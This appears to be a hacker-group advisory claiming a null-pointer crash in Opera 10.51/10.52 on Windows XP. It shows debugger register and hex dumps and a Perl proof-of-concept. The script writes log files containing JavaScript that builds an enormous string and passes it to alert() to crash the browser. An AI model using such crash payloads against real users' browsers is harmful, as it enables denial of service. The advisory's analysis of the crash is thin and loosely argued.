############{In The Name Of Allah The Mercifull}################
# Title : Opera 10.52 & 10.51 nullpoint
# Tested : Windows xp (sp3)
# author: R3d-D3v!L
under 32-bit assembler level analysing debugger
EAX 00000000 <--null point
ECX 0012FFB0
EDX 7C90E514 ntdll.KiFastSystemCallRet
EBX 7FFD5000
ESP 0012FFC4
EBP 0012FFF0
ESI FFFFFFFF
EDI 7C910228 ntdll.7C910228
EIP 00404B5C opera.<ModuleEntryPoint>
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL <--??????
D 0
O 0 LastErr ERROR_NO_IMPERSONATION_TOKEN (0000051D)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -UNORM BDEC 01050104 00000000
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 1.0000000000000000000
ST7 empty 1.0000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
----------------------------------------------------
crash poc
address<--------->hex dump<-------->ASCII
00407000 00 00 00 00 00 00 00 00 ........
00407008 00 00 00 00 00 00 00 00 ........
00407010 43 72 61 73 68 20 6C 6F Crash lo
00407018 67 20 77 72 69 74 69 6E g writin
00407020 67 20 66 61 69 6C 65 64 g failed
00407028 2C 20 25 73 21 0A 45 72 , %s!.Er
00407030 72 6F 72 20 64 65 73 63 ror desc
00407038 72 69 70 74 69 6F 6E 20 ription
00407040 66 72 6F 6D 20 73 79 73 from sys
00407048 74 65 6D 3A 20 25 73 00 tem: %s.
00407050 B0 A4 AC A8 A0 9C B4 C4 ¬ œؤ
00407058 B8 C0 BC 98 C8 94 90 8C ہ¼کب”گŒ
00407060 87 82 7E 7D 78 74 73 6E ‡‚~}xtsn
00407068 6A 69 64 60 5F 5A 56 55 jid`_ZVU
00407070 50 4C 4B 46 42 41 3C 38 PLKFBA<8
00407078 21 1D 00 00 00 00 00 00 !�......
00407080 4F 50 45 52 41 2D 43 52 OPERA-CR
00407088 41 53 48 4C 4F 47 20 56 ASHLOG V
00407090 31 20 64 65 73 6B 74 6F 1 deskto
00407098 70 20 31 30 2E 35 32 20 p 10.52
004070A0 33 33 37 30 20 77 69 6E 3370 win
004070A8 64 6F 77 73 0D 0A 25 73 dows..%s
004070B0 20 63 61 75 73 65 64 20 caused
004070B8 65 78 63 65 70 74 69 6F exceptio
004070C0 6E 20 25 58 20 61 74 20 n %X at
004070C8 61 64 64 72 65 73 73 20 address
004070D0 25 30 38 58 20 28 42 61 %08X (Ba
004070D8 73 65 3A 20 25 58 29 0D se: %X).
004070E0 0A 0D 0A 52 65 67 69 73 ...Regis
004070E8 74 65 72 73 3A 0D 0A 45 ters:..E
004070F0 41 58 3D 25 30 38 58 20 AX=%08X
004070F8 20 20 45 42 58 3D 25 30 EBX=%0
00407100 38 58 20 20 20 45 43 58 8X ECX
00407108 3D 25 30 38 58 20 20 20 =%08X
00407110 45 44 58 3D 25 30 38 58 EDX=%08X
00407118 20 20 20 45 53 49 3D 25 ESI=%
00407120 30 38 58 0D 0A 45 44 49 08X..EDI
00407128 3D 25 30 38 58 20 20 20 =%08X
00407130 45 42 50 3D 25 30 38 58 EBP=%08X
00407138 20 20 20 45 53 50 3D 25 ESP=%
00407140 30 38 58 20 20 20 45 49 08X EI
00407148 50 3D 25 30 38 58 20 46 P=%08X F
00407150 4C 41 47 53 3D 25 30 38 LAGS=%08
00407158 58 0D 0A 43 53 3D 25 30 X..CS=%0
00407160 34 58 20 20 20 44 53 3D 4X DS=
00407168 25 30 34 58 20 20 20 53 %04X S
00407170 53 3D 25 30 34 58 20 20 S=%04X
00407178 20 45 53 3D 25 30 34 58 ES=%04X
00407180 20 20 20 46 53 3D 25 30 FS=%0
00407188 34 58 20 20 20 47 53 3D 4X GS=
00407190 25 30 34 58 0D 0A 46 50 %04X..FP
00407198 55 20 73 74 61 63 6B 3A U stack:
004071A0 0D 0A 25 30 34 58 25 30 ..%04X%0
004071A8 38 58 25 30 38 58 20 25 8X%08X %
004071B0 30 34 58 25 30 38 58 25 04X%08X%
004071B8 30 38 58 20 25 30 34 58 08X %04X
004071C0 25 30 38 58 25 30 38 58 %08X%08X
004071C8 0D 0A 25 30 34 58 25 30 ..%04X%0
004071D0 38 58 25 30 38 58 20 25 8X%08X %
004071D8 30 34 58 25 30 38 58 25 04X%08X%
004071E0 30 38 58 20 25 30 34 58 08X %04X
004071E8 25 30 38 58 25 30 38 58 %08X%08X
004071F0 0D 0A 25 30 34 58 25 30 ..%04X%0
004071F8 38 58 25 30 38 58 20 25 8X%08X %
00407200 30 34 58 25 30 38 58 25 04X%08X%
00407208 30 38 58 20 53 57 3D 25 08X SW=%
00407210 30 34 58 20 43 57 3D 25 04X CW=%
00407218 30 34 58 0D 0A 0D 0A 53 04X....S
00407220 74 61 63 6B 20 64 75 6D tack dum
00407228 70 3A 0D 0A 00 00 00 00 p:......
00407230 0D 0A 55 73 65 64 20 44 ..Used D
00407238 4C 4C 73 3A 0D 0A 00 00 LLs:....
00407240 0D 0A 4D 65 6D 6F 72 79 ..Memory
00407248 20 64 75 6D 70 73 3A 0D dumps:.
00407250 0A 00 00 00 20 59 40 00 .... Y@.
00407258 54 73 40 00 50 73 40 00 Ts@.Ps@.
00407260 4C 73 40 00 48 73 40 00 Ls@.Hs@.
00407268 44 73 40 00 40 73 40 00 Ds@.@s@.
00407270 3C 73 40 00 38 73 40 00 <s@.8s@.
00407278 34 73 40 00 30 73 40 00 4s@.0s@.
00407280 4F 70 65 72 61 20 63 72 Opera cr
00407288 61 73 68 65 64 20 77 68 ashed wh
00407290 69 6C 65 20 74 72 79 69 ile tryi
00407298 6E 67 20 74 6F 20 73 68 ng to sh
004072A0 6F 77 20 74 68 65 20 63 ow the c
004072A8 72 61 73 68 20 64 69 61 rash dia
004072B0 6C 6F 67 75 65 20 66 6F logue fo
004072B8 72 20 61 20 70 72 65 76 r a prev
004072C0 69 6F 75 73 20 63 72 61 ious cra
004072C8 73 68 2E 0A 41 20 63 72 sh..A cr
004072D0 61 73 68 20 6C 6F 67 20 ash log
004072D8 77 61 73 20 63 72 65 61 was crea
004072E0 74 65 64 20 68 65 72 65 ted here
004072E8 3A 0A 25 73 0A 50 6C 65 :.%s.Ple
004072F0 61 73 65 20 73 65 6E 64 ase send
004072F8 20 75 73 20 74 68 69 73 us this
00407300 20 6C 6F 67 20 6D 61 6E log man
00407308 75 61 6C 6C 79 2E 00 00 ually...
00407310 2D 63 72 61 73 68 6C 6F -crashlo
00407318 67 20 22 25 73 22 00 00 g "%s"..
00407320 D0 3D 15 00 20 00 00 00 ذ=�. ...
00407328 00 00 00 00 00 00 40 00 ......@.
00407330 EB AE 80 7C FF 6F DD 77 ®€|ےoفw
00407338 AF 6A DD 77 6B 99 A0 7C ¯jفwk™ |
00407340 63 1F 83 7C 48 5D AB 7C c�ƒ|H]«|
00407348 00 08 81 7C 81 EF 80 7C .�پ|پï€|
00407350 91 07 83 7C 75 B4 80 7C ‘�ƒ|u€|
00407358 00 00 00 00 00 00 00 00 ........
00407360 02 1F 15 00 A4 22 86 7C ���."†|
00407368 00 00 00 00 F4 1E BF 76 ....�؟v
00407370 76 3A BF 76 4D 20 BF 76 v:؟vM ؟v
00407378 00 00 00 00 00 00 00 00 ........
00407380 70 3F 15 00 8B 79 DD 77 p?�.‹yفw
00407388 05 73 DD 77 11 82 DD 77 �sفw�‚فw
00407390 C9 7C DD 77 CA 7F DD 77 ة|فwتفw
00407398 B8 7C DD 77 00 00 DD 77 |فw..فw
004073A0 00 00 00 00 24 2F C3 76 ....$/أv
004073A8 57 53 AA 77 DA CC A9 77 WSھwعج©w
004073B0 A4 6C A9 77 65 2D AC 77 l©we-¬w
004073B8 5F 1F A9 77 AE D6 A8 77 _�©w®ضw
004073C0 DF A5 A9 77 00 00 00 00 ك¥©w....
prove of concept
by ASCII DETAILS WE CAN SEE { Crash log writing failed, %s!.Error desc ription from system: %s.}
AND
{Opera crashed while trying to show the crash dialogue for a previous crash..A crash logwas created here:.%s.Please sendus thislog manually...-crashlog "%s"..}
so lets GET THE TRUST ;)
#!\c:\perl\bin
print qq(
###################################################
## Opera 10.52 local crash poc ##
## Credits : information arabian security ##
## http://WwW.xp10.mE XP10_hacker ##
## Author : R3d-D3V!L <x[at]hotmail.co.jp> ##
## Greetz : xp10_HACKER DR.DASHER ##
## all member at WwW.XP10.mE ##
###################################################
);
my $header = "<login=>\n<logout=>\n";
my $footer = "</login=>\n</logout=>";
my $uhoh1 = "var buf = 'A';\n".
"while (buf.length <= 4444444444) buf+=buf;\n".
"alert(buf)\n";
##################################################################
open(myfile,'>> uhoh1.log');
print myfile $header.$uhoh1.$footer;
##################################################################
my $uhoh2 = "alert(\'". "A" x 4444444444 ."'\)"."\n";
##################################################################
open(myfile,'>> uhoh2.log');
print myfile $header.$uhoh2.$footer;
##################################################################
print "\nDone, successfully created in the darkness !\n";
##[~]-----------------------------{((MAGOUSH-87))}--------------------------------------- ##########
#
## Author : R3d-D3v!L <X[at]hotmail.co.jp>
# Credits to : XP10_HACKER ((xp10.com)) ##
#
##spechial SupP0RT: MY M!ND ;) & every one in the great castle of security (sevurity reason)
#
## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah &S!R-TOTTi & Abo-ShA@D ##
#
##[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
#
##[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ
## all member at XP10.com ##
#[~] !'M 4R48!4N 3XPL0!73R
#
#[~]{[(D!R 4ll 0R D!E)]};
#
#[~]---------------------------------------------------------------------------------------------
#####################################################################
